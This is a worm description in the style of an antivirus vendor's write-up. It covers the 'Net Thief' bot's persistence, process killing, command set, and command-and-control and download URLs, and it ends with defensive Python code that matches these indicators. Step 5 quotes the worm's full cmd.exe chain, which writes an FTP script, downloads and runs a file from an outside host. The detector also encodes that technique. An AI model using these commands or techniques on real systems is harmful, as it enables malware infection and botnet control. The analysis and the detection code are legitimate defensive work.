Virus name (Chinese):
网贼 ("Net Thief")
Alias:
Threat level:
★☆☆☆☆
Virus type:
Worm
Virus length:
32738
Affected systems:
Win9x, WinMe, WinNT, Win2000, WinXP, Win2003
Behaviour:
This worm spreads over the network. It attempts to update itself, opens a backdoor through which a controller can issue commands, terminates security software, and turns the infected machine into a bot.
1. Creates the file:
%System%\mmsvc32.exe
2. Adds startup entries so the virus runs at boot:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
MicrosoftNetworkServicesController
mmsvc32.exe
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
MicrosoftNetworkServicesController
mmsvc32.exe
3. Finds and closes the processes owning the following windows, then registers a window with the same name itself so the original program cannot be started again:
DBMWin
TDBMWin
4. Deletes the following Run entries:
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
MicrosoftIIS
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
PayTime
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
lp3mr1sh
5. Creates a thread that runs the following command (an FTP script is written with echo redirects, run with ftp -s:, deleted, and the downloaded file executed):
cmd.exe /c echo user nnpy@web.cplnn.com > ntsdd.txt
&& echo f729lQjd >> ntsdd.txt
&& echo binary >> ntsdd.txt
&& echo get mmf32.exe >> ntsdd.txt
&& echo quit >> ntsdd.txt
&& ftp -s:ntsdd.txt -n-nnpyf.cplnn.com
&& del ntsdd.txt
&& mmf32.exe
6. Runs the following commands to terminate security software processes:
!proc.kill.*ftp.exe
!proc.kill.*tftp.exe
!proc.kill.*nh.exe
!proc.kill.*nethost.exe
!proc.kill.*syshost.exe
!proc.kill.*ppc.exe
!proc.kill.*paytime.exe
!proc.kill.*lp3mr1sh.exe
!proc.kill.*tibs.exe
!proc.kill.*opera.exe
!proc.kill.*netscape.exe
7. Attempts to connect to the following addresses:
http://nnpy.cplnn.com/lipscr2.php
http://dnsf.nnctx.com.ru/ipconf.cfg
http://nnpyev.nnctx.com.ru/wad/nnpy.txt
http://www.ppwex.com/sdata.txt
http://wlog.cplnn.com/wlog.php?action=knock
8. Accepts the following commands:
!HTTP.DOS
!UDP.DDOS
!PROC.KILL
!RUN
!URL.DOWNLOAD
!UPDATE
!AFTP.CONFIG
!URL.SPOOF
!IE.COUNTER
9. Attempts to download the following files:
http://web.cplnn.com/bbot.exe
http://web.cplnn.com/psvc.exe
http://www.gmz41-soft.com/vxupd.exe
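Added example (not part of this description): Python triage helpers that apply the indicators above to telemetry that has already been collected. The command-line check covers the echo-then-ftp -s: script download of step 5, the Run-key check covers the persistence value of step 2, and the URL check covers the hosts in steps 7 and 9. The sample events are constructed, and the functions assume input already parsed from a Sysmon/EDR export or a registry dump rather than live access to a host.

```python
"""Triage helpers for the mmsvc32.exe worm indicators listed in this description.

Added example, not part of the original page. All sample data below is
constructed; nothing here touches a live registry or process list.
"""
import ntpath
import re
from urllib.parse import urlparse

# Indicators copied from the description (file names from steps 1, 5 and 9,
# the Run value name from step 2, the domains from steps 7 and 9).
IOC_FILE_NAMES = {"mmsvc32.exe", "mmf32.exe", "bbot.exe", "psvc.exe", "vxupd.exe"}
IOC_RUN_VALUE_NAMES = {"microsoftnetworkservicescontroller"}
IOC_DOMAINS = {"cplnn.com", "nnctx.com.ru", "ppwex.com", "gmz41-soft.com"}

# "echo <text> > file" or "echo <text> >> file" fragments inside a chained command.
ECHO_REDIRECT_RE = re.compile(r"\becho\b[^&|>]*>{1,2}\s*(\S+)", re.I)
# "ftp [-n] -s:<file> ..." : ftp.exe driven by a script file.
FTP_SCRIPT_RE = re.compile(r"\bftp(?:\.exe)?\s+(?:-\w+\s+)*-s:(\S+)", re.I)


def ftp_script_dropper(cmdline):
    """Return the script file name when a single command line both writes a file
    with echo redirects and then feeds that same file to ftp -s: (the download
    technique of step 5). Returns None when the pattern is absent, including the
    benign case of ftp -s: pointing at a file the command did not just create."""
    m = FTP_SCRIPT_RE.search(cmdline)
    if not m:
        return None
    script = m.group(1).lower()
    written = {f.lower() for f in ECHO_REDIRECT_RE.findall(cmdline)}
    return script if script in written else None


def _image_name(data):
    """First token of a Run value's data, quoted or not, reduced to its file name."""
    m = re.match(r'\s*(?:"([^"]*)"|(\S+))', data)
    if not m:
        return ""
    return ntpath.basename(m.group(1) or m.group(2)).lower()


def run_key_hits(run_values):
    """run_values: {value_name: data} dumped from a ...\\CurrentVersion\\Run key
    (HKCU or HKLM). Flags the value name from step 2 and any entry whose image
    file name is one of the listed files."""
    hits = []
    for name, data in run_values.items():
        if name.lower() in IOC_RUN_VALUE_NAMES:
            hits.append((name, data, "known persistence value name"))
        elif _image_name(data) in IOC_FILE_NAMES:
            hits.append((name, data, "known file name " + _image_name(data)))
    return hits


def url_ioc_domain(url):
    """Return the listed domain a URL belongs to (exact host or subdomain), else None."""
    host = (urlparse(url).hostname or "").lower()
    for dom in IOC_DOMAINS:
        if host == dom or host.endswith("." + dom):
            return dom
    return None


if __name__ == "__main__":
    # Constructed telemetry: the step-5 command line, a benign ftp invocation,
    # a Run-key dump with one planted entry, and two proxy-log URLs.
    cmd = ("cmd.exe /c echo user nnpy@web.cplnn.com > ntsdd.txt && echo f729lQjd >> ntsdd.txt "
           "&& echo binary >> ntsdd.txt && echo get mmf32.exe >> ntsdd.txt && echo quit >> ntsdd.txt "
           "&& ftp -s:ntsdd.txt -n-nnpyf.cplnn.com && del ntsdd.txt && mmf32.exe")
    for line in (cmd, "ftp -n -s:backup_job.txt files.example.internal"):
        print("ftp script dropper:", ftp_script_dropper(line))
    run_dump = {
        "MicrosoftNetworkServicesController": "mmsvc32.exe",
        "OneDrive": '"C:\\Users\\a\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background',
    }
    for hit in run_key_hits(run_dump):
        print("run key hit:", hit)
    for url in ("http://web.cplnn.com/bbot.exe", "https://www.example.com/index.html"):
        print(url, "->", url_ioc_domain(url))
```

The command-line check deliberately requires both halves of the pattern (echo writes, then ftp -s: on the same file) so that ordinary scripted FTP jobs whose script already exists on disk do not alert; feed it the full command line of cmd.exe process-creation events, since the chain is only visible there.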